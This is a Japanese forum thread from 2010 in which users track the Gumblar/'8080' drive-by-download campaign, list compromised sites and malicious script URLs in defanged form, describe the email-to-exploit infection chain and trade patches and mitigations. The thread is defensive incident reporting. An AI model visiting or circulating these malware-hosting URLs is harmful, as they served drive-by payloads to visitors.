::≡≡≡::/ ヽ≡ヽ≡::|―、≡≡::l ..|≡::| / ミ 1´/ヽ==,...
::≡≡≡| \≡ヽ::| ヽ≡≡l .ljヽl | 刀、ミ _,,,..-`‐三=ー-
::≡≡≡| |ヽ/ー.、.. ヽ≡≡l. .|/ | ノ= ∠i /ヽ、≡≡≡≡≡
:|¬、≡≡ヽ. |≡ゞー=ッ |≡≡| __/ (ll ー゜\|ヽ. /≡::ヽ≡≡≡≡≡
:| ヽ≡≡ヽ |≡≡ヽミ. |≡≡| l|. ll7| ヽu=/l二ll二l'''ヽ /≡:::/≡≡≡≡≡
836:名無しさん@お腹いっぱい。
10/06/24 13:23:57
そして自分で調べる過程で踏むんですねわかります
マジで初心者にも分かるgumblerスレないよな
これじゃ身内同士だけで身を固めてるだけで「騒ぎ収まらないねー」と愚痴っても
そりゃ収まらんわって気が
wikiも現行版に完全に通用しない古い情報ばかりだしな……
837:名無しさん@お腹いっぱい。
10/06/24 14:33:41
AdobeReaderじゃなくてFoxit Reader使ってる
838:名無しさん@お腹いっぱい。
10/06/24 15:16:48
>>836
そんな狭い規模で起きてるわけじゃないんで
ここがどんなにがんばろうがそれだけで収まるようなもんじゃないよ
初心者スレなんて立ててもバカが混乱したレスするだけで何もならないだろ
同人板がまさにそんな感じだったはず
wikiは見てないから知らんけど変えたいならお前が変えてやれば良いんじゃね
初心者用ならこういうのが良さそう
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
839:名無しさん@お腹いっぱい。
10/06/24 15:41:01
>>838
いや、「騒ぎ収まらないねー」ってぼやいてる人達が滑稽に見えただけさ
俺個人はもう対策終えてるし自分の警戒で手いっぱいだから
そこからさらに慈善事業やろうとは思わない
まぁここですらまともな人が来るまで「パソコン捨てれば?」等の問題外な返しで埋まってる事もあるしな……
テンプレまで改竄されて犯罪まがいの事まで起きるし
ID出ない板故致し方なしか
840:名無しさん@お腹いっぱい。
10/06/24 15:52:27
パソがおかしくなりました><程度の質問しかできないような人が大量に来たら
そりゃ誰でも疲れてPC捨てろという程度の回答になるのは仕方ないんじゃね
まともな質問ができなきゃまともな回答にはならない
まともな人が来るっていうのは要するに
そのときまでのパソ壊れた助けて攻撃に心が折れてない人が来るってことじゃないかと
テンプレ改ざんは別件だけども
841:名無しさん@お腹いっぱい。
10/06/24 17:11:50
>>840
それでもそんなアホな返しをしちゃったら「まともな質問しない奴」と同レベルになっちゃうワケで
傍から見れば同レベルにしか見えない
そういうのはスルーでいいんだぜ……?
テンプレ改竄はどうにかならんかな……
842:名無しさん@お腹いっぱい。
10/06/24 20:06:35
そもそもセキュリティ板とか言いながらIDすら非表示な時点でなw
843:名無しさん@お腹いっぱい。
10/06/24 21:27:10
www4●ocn●ne●jp/~motegi/ ←不動産屋 連絡するが対処せず
www4●ocn●ne●jp/~hanko/ ←はんこや 連絡するが対処せず
www1●ocn●ne●jp/~orchid08/sub5●html ←不動産屋 連絡するが対処せず
www16●ocn●ne●jp/~nisikawa/
www17●ocn●ne●jp/~hidib●j/sirase●html
www2●ocn●ne●jp/~hcy/ryoukin●html (gumblar x)
www2●ocn●ne●jp/~lakeside/
OCNの対応は非常に遅い
844:名無しさん@お腹いっぱい。
10/06/24 21:41:57
> www2●ocn●ne●jp/~hcy/ryoukin●html (gumblar x)
どこにある?
845:名無しさん@お腹いっぱい。
10/06/25 06:35:40
ITWB2 次回「脅威!ガンブラーウイルスの正体」
URLリンク(img189.imageshack.us)
846:名無しさん@お腹いっぱい。
10/06/25 16:57:30
取扱注意
www●wedia-t●com
847:名無しさん@お腹いっぱい。
10/06/25 21:21:38
>>843
対応するのはOCNじゃなくてそこを使ってる利用者だろ・・・
848:735
10/06/25 22:17:18
当館ホームページ改ざんの件
URLリンク(www.maizurusou.co.jp)
849:名無しさん@お腹いっぱい。
10/06/26 11:08:02
XPにゼロデイきたー
URLリンク(www-950.ibm.com)
850:八頭 ◆YAGApwSaEw
10/06/26 11:09:08
bkc-net●com
851:コテハン ◆8080adndqg
10/06/26 13:17:08
【陥落サイトのURL悪用厳禁】
www●hugoinc●us/PDF ←意味不
blog●nadamori●com/ ←新型の「.info:8080」
p-asahi●com/shop/rss/
.biz:8080は来るかな?
852:八頭 ◆YAGApwSaEw
10/06/27 14:23:45
USドメだが
dogforums●com
853:名無しさん@お腹いっぱい。
10/06/27 14:48:38
ume
854:名無しさん@お腹いっぱい。
10/06/27 16:53:29
shabao●com/public_html/top_footer
www●ff●iij4u●or●jp/~ceh/lvvl/ferachan
www●daini-survey●com/xmlrpc●php
www●soul-wave●jp/RAYCA/
855:名無しさん@お腹いっぱい。
10/06/27 22:25:22
最近ヤバいコードや新しいコードはどんなのがあるんだ
856:名無しさん@お腹いっぱい。
10/06/27 23:50:01
歴代Gumblar感染サイトとかまとめてる人がいればなあ
857:名無しさん@お腹いっぱい。
10/06/27 23:54:08
このスレの過去ログ全部持ってる人ならいるんじゃない
858:コテハン ◆8080adndqg
10/06/28 00:00:58
【陥落サイトのURL悪用厳禁】
www●cb-med●jp/jb/?a=ds&Id=71
電話番号の8080に引っ掛かってきたw
859:名無しさん@お腹いっぱい。
10/06/28 04:51:59
0-dayやってるグループと大規模にひっかけてるグループじゃ別グループみたいで、
0-dayコードがいきなり大量攻撃に使われることはあまり無いな
860:名無しさん@お腹いっぱい。
10/06/28 07:14:00
まれによくある
861:名無しさん@お腹いっぱい。
10/06/28 11:38:22
>>856-857
とりあえず危険なコードをまとめたtxtファイルなりwikiなりがあると助かるな
862:名無しさん@お腹いっぱい。
10/06/28 13:22:23
そんなの何に使うの?
悪用されることが目に見えてるよ
ついでにコード自体は難読化されてることも多いんでまとめる意味が無い
被害サイト見てもわからないならわからないとおもう
863:名無しさん@お腹いっぱい。
10/06/28 14:37:40
最近、Webサイト改ざんよりも、メールのリンクから感染させようとするのが増えてきてる。
メールのリンクをクリック
↓
リンク先から com;8080、info;8080 へリダイレクト
↓
index.phpを読み込む
↓
pdfとJREファイルをダウンロードしてローカルで実行される
改ざんされたサイトよりも、メールを送りつけられる方が増えてるな…。
SPAMメールなのにリンクをクリックしちゃうユーザが多すぎて困る
864:名無しさん@お腹いっぱい。
10/06/28 14:56:31
自分が警戒するだけなら、こっちの方がずっと楽だなw
865:名無しさん@お腹いっぱい。
10/06/28 18:45:34
最新Gumblar、Windows「ヘルプとサポートセンター」の脆弱性を利用
~JPCERTが注意喚起
URLリンク(www.rbbtoday.com)
対象となる製品とバージョンはWindows XP Service Pack 2および
Windows XP Service Pack 3、Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2、Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systemsの5種。
28日現在、マイクロソフト社より本件に関するセキュリティ更新プログラムは
公開されていないため、軽減策として、HCPプロトコルの登録の解除が提示されている。
また本軽減策を自動的に適用するための“Microsoft Fix it”も公開中とのこと。
866:名無しさん@お腹いっぱい。
10/06/28 20:44:34
>>863
送信ドメイン認証でスパム判定してるから、そういったメールは読まないな
送信ドメイン認証NG→ホワイトリストにはいってる特定アドレス以外はデフォルトでスパムメールと判断
でいいんじゃね?
867:夷塚 ◆y0JEaK6O/gDf
10/06/29 00:06:03
仕事地獄終了…
>>850以降で書き込まれていたURLで、現時点でも
ウイルスが仕込まれているサイトにはメル凸しました
英語サイトはスルー
>>849
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
AviraはNotes1をマルウェアと認定している模様
Avastからは反応なし、対応済みなのかな?
868:夷塚 ◆y0JEaK6O/gDf
10/06/29 16:39:28
blog.unmaskparasites.com/2010/06/17/malware-on-hijacked-subdomains-part-2/
> org:8080/File●js
> biz:8080/File●js
869:名無しさん@お腹いっぱい。
10/06/30 02:29:13
Adobe Acrobat のバージョンアップ
870:名無しさん@お腹いっぱい。
10/06/30 02:39:50
9.3.3.177
871:名無しさん@お腹いっぱい。
10/06/30 16:56:33
Adobeは10年前通ったMicrosoftと同じ道を辿ってるな
872:名無しさん@お腹いっぱい。
10/07/01 07:27:55
yamaga-blanks●com/gazoup2/
yamaga-blanks●com/gazoup2/index●php?mode=rss
yokohamac●com/info/
yokohamac●com/info/?feed=rss2&p=17
873:名無しさん@お腹いっぱい。
10/07/01 14:56:29
本日23:30~ NHK
ITホワイトボックスII「脅威!ガンブラーウイルスの正体」
874:夷塚 ◆y0JEaK6O/gDf
10/07/01 15:49:44
>>872
メル凸済み、反応待ち
www.itmedia.co.jp/enterprise/articles/1007/01/news022.html
随分めんどくさい事になってるようですね
875:名無しさん@お腹いっぱい。
10/07/01 20:47:06
>>874
乙
yokohamacは403になってるもよー。
yamaga-blanksにメルポした。
876:名無しさん@お腹いっぱい。
10/07/01 23:29:58
>>873
たった25分?
877:名無しさん@お腹いっぱい。
10/07/01 23:58:42
ホワイトボックスの解説混同しまくり?
ウェブページの改ざん方法から感染させられるウィルスの情報まで一緒くたでよく分からんかった。
とりあえず、セキュリティーツールという偽アンチウィルスソフトの画面が見られて、ふぅんとは思えた。
878:名無しさん@お腹いっぱい。
10/07/02 00:05:24
NHKやっちまったなw
879:名無しさん@お腹いっぱい。
10/07/02 00:22:24
なにを?
880:名無しさん@お腹いっぱい。
10/07/02 00:28:44
とりあえず、ホワイトボックスの再放送はまだあるから、生で見るなり録画するなりしてみられるよ。
こっちも録画してアップするか、テキストに書き起こしてみる。
881:名無しさん@お腹いっぱい。
10/07/02 00:45:32
不特定多数向けの構成なんだからあんなものだろ。
882:名無しさん@お腹いっぱい。
10/07/02 01:44:31
現在主流の8080系を「Gumblar(亜種)」と呼ぶの・・いい加減やめませんか?
883:名無しさん@お腹いっぱい。
10/07/02 08:45:38
マスゴミがそう書いちゃったから仕方がない。
drive-by-downloadなんて大昔からあるんだけど、
セキュ関係も説明すんのめんどくさくなって
「いわゆるgumlar」で済ませてる所が多い。
884:名無しさん@お腹いっぱい。
10/07/02 18:57:08
>>845>>873
見るのを忘れましたorz
再放送も見逃すかも(´・ω・`)
URLリンク(www.nhk.or.jp)
■ 放送予定
7月3日(土)午前5:00~
「脅威!ガンブラーウイルスの正体」BS2
7月4日(日)午後2:00~
「脅威!ガンブラーウイルスの正体」教育
885:夷塚 ◆y0JEaK6O/gDf
10/07/02 21:08:17
>>875
チェック乙です
「yamaga-blanks●com/gazoup2/」も404みたいですね
そしてGumblar特集を放映してた頃に漁ってたもの
topious●fairwaydrycleaners●net:8080/Scanner●js
topious●fairwaydrycleaners●net:8080/Gnutella●js
topious●fairwaydrycleaners●net:8080/Vector_Graphic●js
huio●e-solutionsystems●net:8080/Hard_Disk●js
.jsに繋がらないので正直何とも言えませんが、一応報告だけ
886:名無しさん@お腹いっぱい。
10/07/02 21:11:10
>>882
じゃあモンブラン
887:名無しさん@お腹いっぱい。
10/07/02 21:20:17
ishikane-hospital●or●jp/isikane_i/
888:名無しさん@お腹いっぱい。
10/07/02 23:54:10
>>887
乙
whoisからめるぽすた。
889:名無しさん@お腹いっぱい。
10/07/03 15:22:14
ゲーム系サイトもまずいのかなあ
890:名無しさん@お腹いっぱい。
10/07/03 16:19:18
少なくとも個人運営サイトは危ないと思う、同人サイトはだいぶ対策が取られてるけどそれでもズカズカ踏み込むのはオススメしないね
ゲームでもwiki系HPならまだ大丈夫……か?詳しくないから解らん
891:名無しさん@お腹いっぱい。
10/07/03 16:39:12
やられない・やられても大丈夫の2段構えにしてるからズカズカ踏み込んでるよ
892:名無しさん@お腹いっぱい。
10/07/03 17:08:50
>>890
>ゲームでもwiki系HPならまだ大丈夫……か?詳しくないから解らん
分からないなら、いい加減なこと言うなよカス。
893:名無しさん@お腹いっぱい。
10/07/03 18:05:43
発売直後の人気ゲームの攻略wikiとか
リンク先がどっかのエロサイトに変えられるとかザラだよな
894:名無しさん@お腹いっぱい。
10/07/03 18:16:08
>>892
お前もお前で一言多いがな
895:名無しさん@お腹いっぱい。
10/07/03 18:40:39
>>887
修正確認
Last-Modified: Sat, 03 Jul 2010 03:16:25 GMT
896:名無しさん@お腹いっぱい。
10/07/03 19:31:50
>>889
ゲームアーツとかGAMESIDE関連のサイトがやられた過去があるから
大手公式サイトでも油断は禁物
897:名無しさん@お腹いっぱい。
10/07/03 20:16:50
三井住友VISAがやられてる時点で
898:名無しさん@お腹いっぱい。
10/07/04 02:11:04
そもそもそういうジャンル分けで考えられる問題じゃない
どこも危ない
899:夷塚 ◆y0JEaK6O/gDf
10/07/04 04:06:14
ちゅらひめにfm:8080…そういえばそんなドメインもありました
しかしいつから埋まってたんだろう
>>889
絶対安全といえるサイトは正直何処にもないですね
FTPの接続先がどんな内容かなんてお構いなしですから
ふと思う、コミックマーケットも近いこの時期にシャッター前サークルや
出展企業の公式サイトが陥落したらと思うとなかなか恐ろしいものが…
900:八頭 ◆YAGApwSaEw
10/07/04 13:34:51
>>夷塚さん甘いよ・・・
URLリンク(i50.tinypic.com)
901:名無しさん@お腹いっぱい。
10/07/04 17:36:08
強いて言えばhtml読み込まない専ブラ使えるとこが比較的安全度高いくらいか
902:名無しさん@お腹いっぱい。
10/07/04 18:19:13
ちょっと調べたが、最近出たHCPプロトコル云々はまたレジストリを弄らないとダメな類か
一般ユーザー涙目ってレヴェルじゃないな……
ところでブラウザのIE8なんだが、インターネットオプションの「ページの自動読み込み」はどうするべきなんだろうか
これつけっぱなしだと感染してるURLのハイパーリンクに触れただけで読み込まれてしまう?
903:名無しさん@お腹いっぱい。
10/07/04 21:30:10
>>902
> HCPプロトコル云々
それFix it出てる
URLリンク(support.microsoft.com)
904:名無しさん@お腹いっぱい。
10/07/05 01:40:42
URLリンク(blogs.itmedia.co.jp)
こういう裁判起こすWeb制作会社にびっくりした
905:夷塚 ◆y0JEaK6O/gDf
10/07/05 03:52:42
www.google.com/safebrowsing/diagnostic?site=[www.楽々茶.com]/&hl=ja
→peer●webserviceaan●ru/js●js
→109●196●134●58/ssl●html
→cache●globalforexnet●com:8080/index●php?pid=6
>>900
仰りたい事が理解できてるか正直不安ですが、ystat.jsの事でしょうか?
間違ってたらごめんなさい
>>902
リンク先読みは無効にしちゃってもいいんじゃないでしょうか
906:八頭 ◆YAGApwSaEw
10/07/05 20:53:11
>>夷塚さん
これは2008年のお話
URLリンク(i45.tinypic.com)
907:八頭 ◆YAGApwSaEw
10/07/05 20:55:56
filelist.us
US留め
908:名無しさん@お腹いっぱい。
10/07/05 21:36:31
ハードディスクに保存したwebページを開いたら
「Adobe Flash Playerは潜在的に危険な操作を停止しました。
お客様のコンピューターまたはネットワークで次のローカルアプリケーション
(ここに保存したwebページのローカルアドレスが入ってます)
はインターネット接続が有効になっている次の場所と通信しようとしています
ai.yimg.jp
このアプリケーションがインターネット通信できるようにするには、
「設定」をクリックしてください。
設定の変更後アプリケーションを再起動する必要があります」
というダイアログが出てきます、これはweb改竄ウイルスでしょうか?
怖いので何もいじくってません
909:908
10/07/05 21:38:21
ちなみにNIS2010は無反応でした
910:名無しさん@お腹いっぱい。
10/07/05 21:48:51
違います
911:名無しさん@お腹いっぱい。
10/07/05 21:59:16
ai.yimg.jpはyahooのAdServerだよ
912:908
10/07/05 22:14:24
>>910-911
違うんですね、よかった・・・
お答えありがとうございました
913:名無しさん@お腹いっぱい。
10/07/06 01:23:58
>>905
修正したみたい。>楽
914:夷塚 ◆y0JEaK6O/gDf
10/07/06 09:40:07
>>906
「その問題はとうの昔に起きていますよ」
というご指摘をされてるんだなと解釈してたんですが…
なんか的外れな事を言ってる気がしてきましたorz
>>913
チェック乙です
精査まではしてませんけど、aguseで見た限りは大丈夫そうですね
915:名無しさん@お腹いっぱい。
10/07/06 15:16:08
URLリンク(www.forest.impress.co.jp)
916:名無しさん@お腹いっぱい。
10/07/06 15:31:06
トレンドマイクロwwww
917:夷塚 ◆y0JEaK6O/gDf
10/07/06 16:45:29
>>913
ぜんぜんだめでした
恐ろしい量の.ru/js.jsが仕込まれてます…
918:名無しさん@お腹いっぱい。
10/07/06 17:00:56
>>908のは例のFlashの設定にある自動的にP2P云々の奴だな
心配なら設定ページで開かないようにすればいい
919:名無しさん@お腹いっぱい。
10/07/06 18:46:49
ブラウザが外部の80と443に接続できるよう許可を与え
8080に接続できないようにPFWで設定しておけば良いのですか?
920:名無しさん@お腹いっぱい。
10/07/06 20:19:46
>>917
あれれ、
「00_css/default.asp」以外にもあるのか。。。
「.ru/js.js」があったときのソース。(注意:アンチウイルスがソースに反応する場合があります。)
URLリンク(megalodon.jp)
いま、撮ったソース。
URLリンク(megalodon.jp)
921:名無しさん@お腹いっぱい。
10/07/06 20:24:36
まずこのスレきたら
>>2を見てURLチェッカーでURL調査しようね^-^
922:名無しさん@お腹いっぱい。
10/07/06 20:25:37
>>920っと。
>>917
見つけました。
そこだけ削除したんか。。。
もいちどメル逝ってきまつ。。。
923:名無しさん@お腹いっぱい。
10/07/06 20:30:24
って>>922
別のアドのads.jsになってた。。。
URLリンク(megalodon.jp)
924:sage
10/07/06 23:04:18
楽々茶はSQLインジェクションだから
データベースを修正すれば全部解決
またやられれば、あちこちにまた挿入…ってことになりますね
925:名無しさん@お腹いっぱい。
10/07/07 00:41:55
ちょっと早いけど次スレ
スレリンク(sec板)
テンプラは改竄されなかったけd(ry
926:名無しさん@お腹いっぱい。
10/07/07 01:34:37
>>917
メルすたお。
>>924
なんですとぉー。。。
>>905でこちらでもcom:8080へ逝ったの確認すたのでしが。。。orz......
927:名無しさん@お腹いっぱい。
10/07/07 01:53:42
>>926
×com:8080へ逝った
○109●196●134●58/ssl●htmlまで逝けてcom:8080へ飛ばそうしてた
com:8080は蹴られたん。
928:名無しさん@お腹いっぱい。
10/07/07 02:29:49
>>919
それで問題ないし感染を防げる
こんな下らんものに感染するのは素人だけ
買ってきたパソコンをそのまま使ってるカス
929:名無しさん@お腹いっぱい。
10/07/07 08:35:25
本当にIDが出ないのをいいことにPC捨てればだのカスだの余計な一言が多いなこのスレ
常に相手を見下して優越感に浸ってないと気が済まない人種なんだろうか……
あと>>925乙
930:名無しさん@お腹いっぱい。
10/07/07 10:35:53
スレの存在意義あるよね、初心者の手助けになってるし^-^
931:名無しさん@お腹いっぱい。
10/07/07 10:54:18
Gumblarってそんなに流行してる?周囲みても引っ掛かった人いないよ・・・・・
最近はルーターとかウイルスソフト入れて対策してるから大丈夫のようです
932:名無しさん@お腹いっぱい。
10/07/07 11:06:06
ここは感染防止のスレじゃないですからねー(汗)
感染してる人を見つけて報告するのが目的ですし
今まで通り仲良くやりましょうよ
>>925乙
933:名無しさん@お腹いっぱい。
10/07/07 11:52:47
>>929
ブラウザが外部の80と443に接続できるよう許可を与え
8080に接続できないようにPFWで設定しておけば良いのですか?
934:名無しさん@お腹いっぱい。
10/07/07 14:02:19
Browser Guard 2010
URLリンク(www.gigafree.net)